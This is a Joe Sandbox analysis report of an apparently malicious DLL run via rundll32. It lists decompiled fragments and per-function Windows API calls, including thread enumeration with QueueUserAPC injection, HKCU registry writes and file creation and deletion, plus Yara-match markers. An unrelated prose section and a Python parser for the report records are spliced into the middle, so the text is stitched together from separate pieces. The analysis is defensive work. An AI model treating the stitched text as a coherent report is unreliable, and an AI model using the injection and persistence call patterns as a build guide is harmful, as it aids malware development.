                                            							_v24 = _t80;
                                            							if(_t80 != 0) {
                                            								_t105 =  *0x49fa348; // 0x57d5a8
                                            								_t28 = _t105 + 0x49fbb08; // 0x530025
                                            								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                            								_push(4);
                                            								_t107 = 5;
                                            								_t83 = E049F4480(_t107,  &_v20);
                                            								_a8 = _t83;
                                            								if(_t83 == 0) {
                                            									_a8 = 0x49f9190;
                                            								}
                                            								_t84 =  *_t115(_a8);
                                            								_t85 =  *_t115(_v8);
                                            								_t86 =  *_t115(_a4);
                                            								_t125 = E049F4DF6(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                            								if(_t125 == 0) {
                                            									E049F4C73(_v24);
                                            								} else {
                                            									_t92 =  *0x49fa348; // 0x57d5a8
                                            									_t44 = _t92 + 0x49fbc80; // 0x73006d
                                            									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                            									 *_a16 = _v24;
                                            									_v28 = _v28 & 0x00000000;
                                            									 *_a20 = _t125;
                                            								}
                                            							}
                                            							E049F4C73(_v8);
                                            						}
                                            						E049F4C73(_v12);
                                            					}
                                            					E049F4C73(_v16);
                                            				}
                                            				return _v28;
                                             			}

                                             Instruction addresses of the C code above (address column from the original side-by-side layout): 0x049f26ed 0x049f26f5 0x049f26f8 0x049f2705 0x049f2708 0x049f270f 0x049f2716 0x049f2719 0x049f2726 0x049f2729 0x049f272c 0x049f2731 0x049f2736 0x049f273e 0x049f2743 0x049f2748 0x049f274e 0x049f2752 0x049f275b 0x049f275f 0x049f2761 0x049f2761 0x049f2769 0x049f276e 0x049f2773 0x049f2779 0x049f2780 0x049f2791 0x049f2798 0x049f27aa 0x049f27af 0x049f27b4 0x049f27bd 0x049f27cf 0x049f27e5 0x049f27ea 0x049f27ee 0x049f27f2 0x049f27f7 0x049f27fc 0x049f27fe 0x049f27fe 0x049f2808 0x049f2811 0x049f2818 0x049f2834 0x049f2838 0x049f2871 0x049f283a 0x049f283d 0x049f2845 0x049f2856 0x049f285e 0x049f2866 0x049f286a 0x049f286a 0x049f2838 0x049f2879 0x049f2879 0x049f2881 0x049f2881 0x049f2889 0x049f2889 0x049f2895

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 049F26FF
                                            • lstrlen.KERNEL32(00000000,00000005), ref: 049F2780
                                            • lstrlen.KERNEL32(?), ref: 049F2791
                                            • lstrlen.KERNEL32(00000000), ref: 049F2798
                                            • lstrlenW.KERNEL32(80000002), ref: 049F279F
                                            • wsprintfW.USER32 ref: 049F27E5
                                            • lstrlen.KERNEL32(?,00000004), ref: 049F2808
                                            • lstrlen.KERNEL32(?), ref: 049F2811
                                            • lstrlen.KERNEL32(?), ref: 049F2818
                                            • lstrlenW.KERNEL32(?), ref: 049F281F
                                            • wsprintfW.USER32 ref: 049F2856
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                            • String ID:
                                            • API String ID: 822878831-0
                                            • Opcode ID: fec7a1f3921c9eff13fac614690193828f92ba880719fdf16454132c4778492a
                                            • Instruction ID: f0709cfbd9f443d97f43041958fc59530c7ce807be6cda7f1e323e550e0a4ebb
                                            • Opcode Fuzzy Hash: fec7a1f3921c9eff13fac614690193828f92ba880719fdf16454132c4778492a
                                            • Instruction Fuzzy Hash: 6B519D72D00219BBDF11AFA4DC44ADE7BB5EF84358F058075EA04A7220DB35EA21DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05809F04
                                            • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 05809F19
                                            • RegCreateKeyA.ADVAPI32(80000001,?), ref: 05809F41
                                            • HeapFree.KERNEL32(00000000,?), ref: 05809F82
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05809F92
                                            • RtlAllocateHeap.NTDLL(00000000,0581782C), ref: 05809FA5
                                            • RtlAllocateHeap.NTDLL(00000000,0581782C), ref: 05809FB4
                                            • HeapFree.KERNEL32(00000000,00000000,?,0581782C,00000000,?,?,?), ref: 05809FFE
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0581782C,00000000,?,?,?,?), ref: 0580A022
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0581782C,00000000,?,?,?), ref: 0580A047
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0581782C,00000000,?,?,?), ref: 0580A05C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Allocate$CloseCreate
                                            • String ID:
                                            • API String ID: 4126010716-0
                                            • Opcode ID: 172ec0db17ea90e2e61807d611bd82a7e8bf2ac59ccbf5e4e18656cbec4c8c88
                                            • Instruction ID: f8657c3f685ad67d2bdd0bceafc448880bc14558717d22f8833f7b09dd211a78
                                            • Opcode Fuzzy Hash: 172ec0db17ea90e2e61807d611bd82a7e8bf2ac59ccbf5e4e18656cbec4c8c88
                                            • Instruction Fuzzy Hash: 8E51BEB680020DEFDF519FA4DC858EEBFB9FB08314F10846AFA06A2160D7315E949F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PathFindFileNameW.SHLWAPI(?), ref: 058169FB
                                            • PathFindFileNameW.SHLWAPI(?), ref: 05816A11
                                            • lstrlenW.KERNEL32(00000000), ref: 05816A54
                                            • RtlAllocateHeap.NTDLL(00000000,05822F1D), ref: 05816A6A
                                            • memcpy.NTDLL(00000000,00000000,05822F1B), ref: 05816A7D
                                            • _wcsupr.NTDLL ref: 05816A89
                                            • lstrlenW.KERNEL32(?,05822F1B), ref: 05816AC2
                                            • RtlAllocateHeap.NTDLL(00000000,?,05822F1B), ref: 05816AD7
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 05816AED
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05816B13
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05816B22
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                            • String ID:
                                            • API String ID: 3868788785-0
                                            • Opcode ID: 0c995938a01c2b193e50b197c3913c178e240d9f8e90e7e7899f949d2e62cbb8
                                            • Instruction ID: ac1bf8a0af2fdfd9567aa2927aa6d4bcce185ab1775c6d7a05788044ce71d79f
                                            • Opcode Fuzzy Hash: 0c995938a01c2b193e50b197c3913c178e240d9f8e90e7e7899f949d2e62cbb8
                                            • Instruction Fuzzy Hash: 12312832214204ABD630AF76AC8996B7FEDFF48310B14851DFE46D3550EF30AC848B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05812E7C
                                              • Part of subcall function 0580B0A5: RegCloseKey.ADVAPI32(?), ref: 0580B12C
                                            • lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 05812EAB
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 05812EBC
                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05812EF6
                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000004,00000004), ref: 05812F18
                                            • RegCloseKey.ADVAPI32(?), ref: 05812F21
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 05812F37
                                            • HeapFree.KERNEL32(00000000,?), ref: 05812F4C
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05812F60
                                            • HeapFree.KERNEL32(00000000,?), ref: 05812F75
                                            • RegCloseKey.ADVAPI32(?), ref: 05812F7E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                                            • String ID:
                                            • API String ID: 534682438-0
                                            • Opcode ID: ab10e0aabe34c788168ce21ca16a614659f49c3f84ff6cf1c8caf99a3035405e
                                            • Instruction ID: 1c2faf1618c70e90511bcb8d8eca788e08d64304b9bc114c9695b620b311bf98
                                            • Opcode Fuzzy Hash: ab10e0aabe34c788168ce21ca16a614659f49c3f84ff6cf1c8caf99a3035405e
                                            • Instruction Fuzzy Hash: B3311775610108BFDF21AFA5EC89DAE7FB9FB48701B148025FE06D2120DB32AA85DF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05810285
                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094), ref: 05810297
                                            • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094), ref: 058102A4
                                            • wsprintfA.USER32 ref: 058102BF
                                            • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,0580B047,00000000,00000094,00000000), ref: 058102D5
                                            • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 058102EE
                                            • WriteFile.KERNEL32(00000000,00000000), ref: 058102F6
                                            • GetLastError.KERNEL32 ref: 05810304
                                            • CloseHandle.KERNEL32(00000000), ref: 0581030D
                                            • GetLastError.KERNEL32(?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094,00000000), ref: 0581031E
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,0582049C,00000094,00000000,00000001,00000094,00000000,00000000,?,0580B047,00000000,00000094), ref: 0581032E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                                            • String ID:
                                            • API String ID: 3873609385-0
                                            • Opcode ID: 3b40152af432781664d36df56426a1ea64868f2686e329087a38dd52f0776269
                                            • Instruction ID: 09277fde7866afd936997bf5bb2066091383138692ec9b54f42e63c6afa495a7
                                            • Opcode Fuzzy Hash: 3b40152af432781664d36df56426a1ea64868f2686e329087a38dd52f0776269
                                            • Instruction Fuzzy Hash: F611C072111218BFE630AB64AC8DEBB3E9CEB45365F008024FD06C2150DE212CC48676
                                            Uniqueness

                                            Uniqueness Score: -1.00%
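The per-function records in this report share one fixed layout: an APIs list (direct calls plus "Part of subcall function" lines for inlined callees), a Memory Dump Source line, a Similarity block carrying API ID, API String ID and the opcode/instruction fuzzy hashes, and a Uniqueness Score. Two of them are worth pulling apart here: the function at ref 05812E7C, which opens and creates keys under root handle 80000001 and calls RegSetValueExA with dwType 00000004 (REG_DWORD), and the function at ref 05810297, which resolves the Windows directory, builds a path with wsprintfA, and opens it with CreateFileA for GENERIC_READ|GENERIC_WRITE (C0000000) before WriteFile. Turning such records into structured data lets an analyst pivot on API String ID and Instruction Fuzzy Hash across reports and filter functions by what they call. The Python parser below is an added example and not Joe Sandbox code: its two sample records are copied from the two functions just named, with call lists shortened; the root-handle table uses the documented Win32 HKEY_* values; and the behaviour tags at the end are this example's own heuristics, not a Joe Sandbox signature.

```python
"""Parse Joe Sandbox per-function records ("APIs ... Uniqueness Score" blocks)
into structured data so call lists, registry writes and fuzzy hashes can be
pivoted on across reports.  Added example, not Joe Sandbox code."""
import re

# "Name.MODULE(args), ref: ADDR"; args and ref are optional, callees prefixed
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,? ref: (?P<ref>[0-9A-Fa-f]+))?$")
SECTIONS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches",
            "Similarity", "Uniqueness", "Strings"}
HIVES = {"80000000": "HKCR", "80000001": "HKCU",        # documented Win32
         "80000002": "HKLM", "80000003": "HKU"}          # HKEY_* root handles
REG_DWORD = "00000004"                                   # RegSetValueEx dwType

def parse_records(text):
    """Return one dict per record: {"calls": [...], "fields": {...}}."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":                       # every record starts here
            rec = {"calls": [], "fields": {}}
            records.append(rec)
            section = "APIs"
        elif not line or rec is None:
            continue
        elif line in SECTIONS:
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                rec["calls"].append({
                    "name": m.group("name"), "module": m.group("module"),
                    "args": args.split(",") if args else [],
                    "ref": m.group("ref"), "subcall_of": m.group("sub")})
        elif ":" in line:                        # "Key: Value" metadata lines
            key, _, value = line.partition(":")
            if key == "Source File":   # "...sdmp, Offset: X, based on PE: y"
                value, *rest = [p.strip() for p in value.split(",")]
                for part in rest:
                    k, _, v = part.partition(":")
                    rec["fields"][k.strip()] = v.strip()
            rec["fields"][key.strip()] = value.strip()
    return records

def reg_dword_writes(rec):
    """RegSetValueEx* calls whose dwType argument (index 3) is REG_DWORD."""
    return [c for c in rec["calls"] if c["name"].startswith("RegSetValueEx")
            and len(c["args"]) > 3 and c["args"][3] == REG_DWORD]

def registry_hives(rec):
    """Root hives passed as the first argument to RegOpenKey*/RegCreateKey*."""
    return sorted({HIVES.get(c["args"][0], c["args"][0]) for c in rec["calls"]
                   if c["args"] and c["name"].startswith(("RegOpenKey", "RegCreateKey"))})

TAGS = {"registry_write": {"RegSetValueExA", "RegSetValueExW"},  # this example's
        "file_write": {"WriteFile"}}                             # own heuristics

def tag_record(rec):
    """Behaviour tags from the function's own (non-subcall) API names."""
    names = {c["name"] for c in rec["calls"] if c["subcall_of"] is None}
    return sorted(t for t, apis in TAGS.items() if names & apis)

SAMPLE = """\
APIs
• RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05812E7C
  • Part of subcall function 0580B0A5: RegCloseKey.ADVAPI32(?), ref: 0580B12C
• lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 05812EAB
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05812EF6
• RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000004,00000004), ref: 05812F18
• RegCloseKey.ADVAPI32(?), ref: 05812F21
• HeapFree.KERNEL32(00000000,?), ref: 05812F4C
Memory Dump Source
• Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
Similarity
• API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
• String ID:
• API String ID: 534682438-0
• Instruction Fuzzy Hash: B3311775610108BFDF21AFA5EC89DAE7FB9FB48701B148025FE06D2120DB32AA85DF14
Uniqueness Score: -1.00%
APIs
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000), ref: 05810297
• wsprintfA.USER32 ref: 058102BF
• CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000), ref: 058102D5
• WriteFile.KERNEL32(00000000,00000000), ref: 058102F6
• GetLastError.KERNEL32 ref: 05810304
Memory Dump Source
• Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
Similarity
• API String ID: 3873609385-0
• Instruction Fuzzy Hash: F611C072111218BFE630AB64AC8DEBB3E9CEB45365F008024FD06C2150DE212CC48676
Uniqueness Score: -1.00%
"""
if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r["fields"]["API String ID"], tag_record(r), registry_hives(r),
              [c["ref"] for c in reg_dword_writes(r)])
```

Report text can be pasted in as-is: the bullet is stripped before matching, subcall lines keep their parent address in `subcall_of` so that inlined callee calls can be excluded when tagging, and the `$`-separated API ID groups are stored verbatim because the page does not document how they are derived. For the first sample record the parser reports the REG_DWORD write at 05812F18 under HKCU; for the second it reports only the file-write tag.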

                                            APIs
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 05801A7A
                                            • StrChrA.SHLWAPI(00000001,0000002C), ref: 05801A8D
                                            • StrTrimA.SHLWAPI(?,?), ref: 05801AB0
                                            • StrTrimA.SHLWAPI(00000001,?), ref: 05801ABF
                                            • lstrlen.KERNEL32(?), ref: 05801AF4
                                            • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05801B07
                                            • lstrcpy.KERNEL32(00000004,?), ref: 05801B25
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 05801B49
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                            • String ID: W
                                            • API String ID: 1974185407-655174618
                                            • Opcode ID: 122c1a93d66724fc31f87dc498351372aa6ceb189d3d7b39aba8e9d2cbaeac76
                                            • Instruction ID: 854f7f2228adbfeea94db3efc377a52acc091154ca1167b6d0aedb1e5384067e
                                            • Opcode Fuzzy Hash: 122c1a93d66724fc31f87dc498351372aa6ceb189d3d7b39aba8e9d2cbaeac76
                                            • Instruction Fuzzy Hash: C1318D35910218BBDB60AFA9CC49EAA7FB9EF48720F009016FC05D7250EB74AD40CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0581BCB7
                                            • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0581BCD6
                                              • Part of subcall function 05813672: wsprintfA.USER32 ref: 05813685
                                              • Part of subcall function 05813672: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05813697
                                              • Part of subcall function 05813672: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 058136C1
                                              • Part of subcall function 05813672: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 058136D4
                                              • Part of subcall function 05813672: CloseHandle.KERNEL32(?), ref: 058136DD
                                            • GetLastError.KERNEL32 ref: 0581BFA9
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0581BFB9
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 0581BFCA
                                            • RtlExitUserThread.NTDLL(?), ref: 0581BFD8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                                            • String ID:
                                            • API String ID: 1258333524-0
                                            • Opcode ID: f627b1f59efe3ce002ba9b95d5ccf86cde6962f00cd6c67fdf59fadd26f89efd
                                            • Instruction ID: ff2bb8d2ec16518b357e810a2cb174be9953cf6489f28bb5af57344cd0e9db82
                                            • Opcode Fuzzy Hash: f627b1f59efe3ce002ba9b95d5ccf86cde6962f00cd6c67fdf59fadd26f89efd
                                            • Instruction Fuzzy Hash: C7B119B1500309AFDB309F65CC88EAA7BAEFF08346F108529FD5AD2160EB70AD558F15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(05D7CBB8,00000000,00000000,00000000,?), ref: 0580C4C1
                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 0580C4D0
                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 0580C4DD
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0580C4F5
                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 0580C501
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580C51D
                                            • wsprintfA.USER32 ref: 0580C5FF
                                            • memcpy.NTDLL(00000000,00004000,?), ref: 0580C64C
                                            • InterlockedExchange.KERNEL32(05829148,00000000), ref: 0580C66A
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580C6AB
                                              • Part of subcall function 0581C301: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0581C32A
                                              • Part of subcall function 0581C301: memcpy.NTDLL(00000000,?,?), ref: 0581C33D
                                              • Part of subcall function 0581C301: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581C34E
                                              • Part of subcall function 0581C301: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581C363
                                              • Part of subcall function 0581C301: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0581C39B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                            • String ID:
                                            • API String ID: 4198405257-0
                                            • Opcode ID: 33c0d6489692bb962382a82c8bbee584ffc70748d74ffe74d839d4eb3fadf3ec
                                            • Instruction ID: 3681e9e486c8ae7d3f5adc2be92a554aec810ff44690c3168f7b6aed50f8cee0
                                            • Opcode Fuzzy Hash: 33c0d6489692bb962382a82c8bbee584ffc70748d74ffe74d839d4eb3fadf3ec
                                            • Instruction Fuzzy Hash: D7615B71A00209AFDF60DFA5CC89EAA7FA9FF48204F048129FC16D7290DB74AD54CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058129F2: memset.NTDLL ref: 05812A14
                                              • Part of subcall function 058129F2: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05812ABE
                                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 05806178
                                            • CloseHandle.KERNEL32(?), ref: 05806184
                                            • PathFindFileNameW.SHLWAPI(?), ref: 05806194
                                            • lstrlenW.KERNEL32(00000000), ref: 0580619D
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058061AE
                                            • wcstombs.NTDLL ref: 058061BD
                                            • lstrlen.KERNEL32(?), ref: 058061CA
                                            • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 05806209
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580621C
                                            • DeleteFileW.KERNEL32(?), ref: 05806229
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                            • String ID:
                                            • API String ID: 2256351002-0
                                            • Opcode ID: b89024d7af31d6207f06b5d6342c58bce122d3d842624fd032acd81745746a6c
                                            • Instruction ID: 0903e1b5167715a6eeb6acdd664439afb07e204edf934e66d53d387e591a545b
                                            • Opcode Fuzzy Hash: b89024d7af31d6207f06b5d6342c58bce122d3d842624fd032acd81745746a6c
                                            • Instruction Fuzzy Hash: B2313931911219ABDF219FA6DC4AE9F3F79FF84311F008025FD02E2160EB319A65DB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 0580BD7D
                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,05829208,00000003,00000000,00000000,?,?,00000000), ref: 0580BD9A
                                            • GetLastError.KERNEL32(?,?,00000000), ref: 0580BE42
                                              • Part of subcall function 05819C23: lstrlen.KERNEL32(?,00000000,?,00000027,05829208,?,00000000,?,?,?,?,?,0580BDC2,?,00000001), ref: 05819C59
                                              • Part of subcall function 05819C23: lstrcpy.KERNEL32(00000000,00000000), ref: 05819C7D
                                              • Part of subcall function 05819C23: lstrcat.KERNEL32(00000000,00000000), ref: 05819C85
                                            • GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 0580BDCD
                                            • CreateFileMappingA.KERNEL32(00000000,05829208,00000002,00000000,00000000,?), ref: 0580BDE1
                                            • lstrlen.KERNEL32(?,?,?,00000000), ref: 0580BDFD
                                            • lstrcpy.KERNEL32(?,?), ref: 0580BE0D
                                            • GetLastError.KERNEL32(?,?,00000000), ref: 0580BE15
                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0580BE28
                                            • CloseHandle.KERNEL32(?,?), ref: 0580BE3A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                            • String ID:
                                            • API String ID: 194907169-0
                                            • Opcode ID: 741b03c5d379a746c725795705cdcfef6851e7c1980f3f17f9daf1f35cffb7af
                                            • Instruction ID: 317d86aef4794675bfb30900e0b3069420b886048be13b1ae6dde09a281f9e91
                                            • Opcode Fuzzy Hash: 741b03c5d379a746c725795705cdcfef6851e7c1980f3f17f9daf1f35cffb7af
                                            • Instruction Fuzzy Hash: 71210871900208FFDB609FA4DC49A9E7FB9FB04355F108469FE56E2260DB30AE948F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CloseHandle.KERNEL32(?), ref: 05805DC6
                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05805DD2
                                            • GetModuleHandleA.KERNEL32(?,05D7978E), ref: 05805DF2
                                            • GetProcAddress.KERNEL32(00000000), ref: 05805DF9
                                            • Thread32First.KERNEL32(?,0000001C), ref: 05805E09
                                            • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05805E24
                                            • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 05805E35
                                            • CloseHandle.KERNEL32(00000000), ref: 05805E3C
                                            • Thread32Next.KERNEL32(?,0000001C), ref: 05805E45
                                            • CloseHandle.KERNEL32(?), ref: 05805E51
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                            • String ID:
                                            • API String ID: 2341152533-0
                                            • Opcode ID: 28eaa475e3ec6d6bee109857d9bb727af17a7081b08cb383fc11c34da244af58
                                            • Instruction ID: ab5f3046c394539de35ed95e446fbed3ea8e1b5d690f5fd9b7ee67ef2dc1f2f1
                                            • Opcode Fuzzy Hash: 28eaa475e3ec6d6bee109857d9bb727af17a7081b08cb383fc11c34da244af58
                                            • Instruction Fuzzy Hash: 03214D72900118AFDF11AFE5DC89DAE7FBDFB08251B008026FE15E6190DB319D458B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetEvent.KERNEL32(?,?,0581F846), ref: 0580609F
                                              • Part of subcall function 0581FDDB: InterlockedExchange.KERNEL32(05815593,000000FF), ref: 0581FDE2
                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0581F846), ref: 058060BF
                                            • CloseHandle.KERNEL32(00000000,?,0581F846), ref: 058060C8
                                            • CloseHandle.KERNEL32(00000000,?,?,0581F846), ref: 058060D2
